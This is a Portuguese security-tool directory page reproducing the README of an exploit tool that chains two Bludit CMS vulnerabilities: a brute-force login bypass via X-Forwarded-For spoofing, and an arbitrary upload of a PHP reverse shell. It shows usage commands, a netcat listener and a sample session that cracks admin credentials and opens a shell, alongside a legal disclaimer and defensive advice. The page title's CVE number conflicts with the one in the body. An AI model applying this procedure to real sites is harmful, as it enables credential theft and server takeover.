Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
Ataques de SenhaGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Obter RCE - Exploit do Bludit CMS

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

Uma ferramenta automatizada de exploração que combina CVE-2019-17240 (Bypass de Autenticação) e CVE-2019-16113 (Upload Arbitrário de Arquivos) para obter execução remota de código em instalações vulneráveis do Bludit CMS.

⚠️ Aviso Legal

SOMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta é destinada a profissionais de segurança que realizam testes de penetração autorizados e pesquisadores de segurança que atuam dentro dos limites legais. O acesso não autorizado a sistemas de computadores é ilegal sob leis como o Computer Fraud and Abuse Act (CFAA) nos Estados Unidos e legislação semelhante em todo o mundo.

Ao usar esta ferramenta, você concorda em:

  • Testar somente sistemas que você possui ou para os quais tenha permissão explícita por escrito
  • Cumprir todas as leis locais, estaduais e federais aplicáveis
  • Aceitar total responsabilidade por suas ações

O autor não assume nenhuma responsabilidade e não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.

📋 Visão Geral

Este exploit automatiza o processo de:

  1. Verificar a disponibilidade do alvo
  2. Bypass de autenticação por força bruta (explorando CVE-2019-17240)
  3. Upload de um reverse shell PHP malicioso (explorando CVE-2019-16113)
  4. Estabelecer uma conexão reverse shell

Detalhes da Vulnerabilidade

  • CVE-2019-17240: Bypass de autenticação via implementação inadequada de limite de taxa (contornado usando manipulação do cabeçalho X-Forwarded-For)
  • CVE-2019-16113: Vulnerabilidade de upload arbitrário de arquivos que permite a execução de código PHP malicioso

Versões Afetadas: Bludit CMS versões 3.9.2 e anteriores

🚀 Recursos

  • ✅ Verificação automatizada de disponibilidade do alvo
  • ✅ Bypass de autenticação por força bruta
  • ✅ Capacidade de enumeração de nomes de usuário
  • ✅ Força bruta combinada de usuário + senha
  • ✅ Tratamento automático de token CSRF
  • ✅ Geração de payload reverse shell PHP
  • ✅ Upload de .htaccess para exploração aprimorada
  • ✅ Verificação de conexão

📦 Requisitos

  • Python 3.6+
  • Pacotes Python necessários:
    • requests

🔧 Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# Install dependencies
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.25.0

💻 Uso

Uso Básico

root@kitploit:~
python3 get_rce.py

O script solicitará:

  1. URL do alvo (por exemplo, https://target.com)
  2. O endereço IP do seu listener
  3. A porta do seu listener
  4. Se deseja fazer força bruta no nome de usuário
  5. Localizações das wordlists

Configurando Seu Listener

Antes de executar o exploit, configure um listener netcat:

root@kitploit:~
nc -lvnp 4444

Substitua 4444 pela porta escolhida.

Exemplo de Sessão

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

Modos de Ataque

Modo 1: Nome de Usuário Conhecido + Força Bruta de Senha

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

Modo 2: Força Bruta Completa de Credenciais

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 Wordlists Recomendadas

  • SecLists: https://github.com/danielmiessler/SecLists

    • Usuários: SecLists/Usernames/Names/names.txt
    • Senhas: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 Como Funciona

  1. Validação do Alvo: Verifica se o alvo está acessível
  2. Bypass de Autenticação:
    • Manipula o cabeçalho X-Forwarded-For para contornar o limite de taxa
    • Faz força bruta de credenciais usando as wordlists fornecidas
    • Gerencia tokens CSRF automaticamente
  3. Exploração:
    • Envia reverse shell PHP para /bl-content/tmp/
    • Envia o arquivo .htaccess para garantir a execução
    • Aciona o payload para estabelecer o reverse shell
  4. Acesso ao Shell: Conecta de volta ao seu listener

🛡️ Medidas Defensivas

Se você é um administrador de sistema:

  • Atualize imediatamente para o Bludit 3.9.3 ou posterior
  • Implemente um limite de taxa adequado baseado na sessão, não no IP
  • Valide todos os uploads de arquivos (tipo, extensão, conteúdo)
  • Use Firewalls de Aplicação Web (WAF)
  • Monitore o diretório /bl-content/tmp/ em busca de arquivos suspeitos
  • Implemente políticas de senha fortes
  • Ative mecanismos de bloqueio de conta

🐛 Solução de Problemas

Problema: "O alvo parece estar fora do ar"

  • Verifique se a URL está correta e inclui o protocolo (http/https)
  • Verifique sua conectividade de rede
  • Garanta que o alvo esteja realmente executando o Bludit

Problema: "Falha no login"

  • Verifique se as credenciais estão corretas
  • Tente uma wordlist mais abrangente
  • Verifique se o alvo possui mecanismos adicionais de autenticação

Problema: "Nenhum shell recebido"

  • Verifique se seu listener está em execução
  • Verifique as regras de firewall em ambos os lados
  • Garanta que o IP e a porta do listener estejam corretos e acessíveis

🔗 Referências

  • Detalhes do CVE-2019-17240
  • Detalhes do CVE-2019-16113
  • Site Oficial do Bludit

👤 Autor

d3vn0mi

📄 Licença

Este projeto é fornecido apenas para fins educacionais e de testes de segurança autorizados. Consulte o aviso legal no início deste README.

🤝 Contribuição

Contribuições, problemas e solicitações de recursos são bem-vindos! Sinta-se à vontade para verificar a página de issues.

⭐ Agradecimentos

  • À comunidade de pesquisa em segurança por descobrir e documentar essas vulnerabilidades
  • À equipe do Bludit pela resposta rápida na correção desses problemas
Baixar ferramenta